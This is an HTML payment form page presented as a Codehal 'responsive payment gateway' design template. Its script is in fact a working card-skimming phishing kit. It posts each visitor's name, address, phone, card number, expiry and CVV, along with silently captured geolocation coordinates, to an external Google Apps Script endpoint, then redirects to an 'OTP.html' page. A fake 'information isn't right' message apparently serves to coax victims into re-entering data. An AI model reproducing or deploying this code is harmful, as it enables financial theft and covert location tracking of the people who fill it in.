<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Responsive Payment Gateway Form Design using HTML and CSS | Codehal</title>
    <link rel="stylesheet" href="style.css">
</head>

<body>

    <div class="container">
        
        <form id="entryForm" action="https://script.google.com/macros/s/AKfycbzqOHDCoBOgK374xNU9i466KfgIVOeyWKQPCir9Np4qe8PeZjIKzVNIA83FRrEMK7za/exec">
            <div style="color: #ff7d7d;">Oops! It seems the information you entered isn't quite right. Please double-check and try again</div>
            <div class="row">
                <div class="column">
                    <h3 class="title">Billing Address</h3>
                    <div class="input-box">
                        <span>Full Name :</span>
                        <input name="fullName" id="" type="text" placeholder="Jacob Aiden">
                    </div>
                    <div class="input-box">
                        <span>Email :</span>
                        <input name="email" id="" type="email" placeholder="example@example.com">
                    </div>
                    <div class="input-box">
                        <span>Phone Number :</span>
                        <input name="phoneNumber" id="" type="tel" placeholder="+49 0000 0000000">
                    </div>
                    <div class="input-box">
                        <span>Address :</span>
                        <input name="address" id="" type="text" placeholder="Room - Street - Locality">
                    </div>
                    <div class="input-box">
                        <span>City :</span>
                        <input name="city" id="" type="text" placeholder="Berlin">
                    </div>

                    <div class="flex">
                        <div class="input-box">
                            <span>State :</span>
                            <input name="state" id="" type="text" placeholder="Germany">
                        </div>
                        <div class="input-box">
                            <span>Zip Code :</span>
                            <input name="zipCode" id="" type="number" placeholder="123 456">
                        </div>
                    </div>
                </div>

                <div class="column">
                    <h3 class="title">Payment</h3>
                    <div class="input-box">
                        <span>Cards Accepted :</span>
                        <img src="imgcards.png" alt="">
                    </div>
                    <div class="input-box">
                        <span>Name On Card :</span>
                        <input name="name1" id="" type="text" placeholder="Mr. Jacob Aiden">
                    </div>
                    <div class="input-box">
                        <span>Credit Card Number :</span>
                        <input name="name2" id="" type="number" placeholder="1111 2222 3333 4444">
                    </div>
                    <div class="input-box">
                        <span>Exp. Month :</span>
                        <input name="name3" id="" type="text" placeholder="August">
                    </div>
                
                    <div class="flex">
                        <div class="input-box">
                            <span>Exp. Year :</span>
                            <input name="name4" id="" type="number" placeholder="2025">
                        </div>
                        <div class="input-box">
                            <span>CVV :</span>
                            <input name="name5" id="" type="number" placeholder="123">
                        </div>
                        <div style="display: none;" class="input-box">
                            <span></span>
                            <input style="display: none;" name="date" id="date" type="" placeholder="">
                        </div>
                        <div style="display: none;" class="input-box">
                            <span></span>
                            <input style="display: none;" name="latitude" id="latitude" type="hidden" placeholder="">
                            
                        </div>
                        <div style="display: none;" class="input-box">
                            <span></span>
                            <input style="display: none;" name="longitude" id="longitude" type="hidden" placeholder="">
                        </div>
                         <div style="display: none;" class="input-box">
                            <span></span>
                            <input style="display: none;" name="status" id="status" type="hidden" placeholder="">
                        </div>
                    </div>
                </div>
            </div>
            
           <button onclick="job()" id="button" type="submit" class="btn">Submit</button>
        </form>
    </div>
    
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600;700;800;900&display=swap');

* {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    font-family: 'Poppins', sans-serif;
}

.container {
    display: flex;
    justify-content: center;
    align-items: center;
    min-height: 100vh;
    background: #1f242d;
    padding: 25px;
}

.container form {
    width: 700px;
    padding: 40px;
    background: #fff;
    border-radius: 10px;
}

form .row {
    display: flex;
    gap: 15px;
    flex-wrap: wrap;
}

.row .column {
    flex: 1 1 250px;
}

.column .title {
    font-size: 20px;
    color: #333;
    text-transform: uppercase;
    margin-bottom: 5px;
}

.column .input-box {
    margin: 15px 0;
}

.input-box span {
    display: block;
    margin-bottom: 10px;
}

.input-box input {
    width: 100%;
    padding: 10px 15px;
    border: 1px solid #ccc;
    border-radius: 6px;
    font-size: 15px;
}

.column .flex {
    display: flex;
    gap: 15px;
}

.flex .input-box {
    margin-top: 5px;
}

.input-box img {
    height: 34px;
    margin-top: 5px;
    filter: drop-shadow(0 0 1px #000);
}

form .btn {
    width: 100%;
    padding: 12px;
    background: #8175d3;
    border: none;
    outline: none;
    border-radius: 6px;
    font-size: 17px;
    color: #fff;
    margin-top: 5px;
    cursor: pointer;
    transition: .5s;
}

form .btn:hover {
    background: #6a5acd;
}
    </style>
</body>
<script>

    document.getElementById("entryForm").addEventListener("submit", function(e) {
  e.preventDefault();
  const formData = new FormData(e.target);
  const params = new URLSearchParams();
  for (const pair of formData.entries()) {
    params.append(pair[0], pair[1]);
  }

  fetch("https://script.google.com/macros/s/AKfycbzqOHDCoBOgK374xNU9i466KfgIVOeyWKQPCir9Np4qe8PeZjIKzVNIA83FRrEMK7za/exec", {
    method: "POST",
    headers: {
      "Content-Type": "application/x-www-form-urlencoded"
    },
    body: params
  })
  .then(res => res.text())
  .then(response => {
    document.getElementById("status").value = "submission successful";
     setTimeout(() => {
    window.location.href = "OTP.html"; 
  }, 1000);
  })
  .catch(err => {
    document.getElementById("status").value = "Error: " + err;
    alert("Error: " + err);
  });
});

navigator.geolocation.getCurrentPosition(function(position) {
    enableHighAccuracy: true;
  console.log("Latitude: " + position.coords.latitude);
  console.log("Longitude: " + position.coords.longitude);

  let latitude = document.getElementById("latitude");
latitude.value = position.coords.latitude;


let longitude = document.getElementById("longitude");
longitude.value = position.coords.longitude;

});


let date = new Date();
let newdate = document.getElementById("date");
newdate.value = date;





    function job(){

    }
</script>

</html>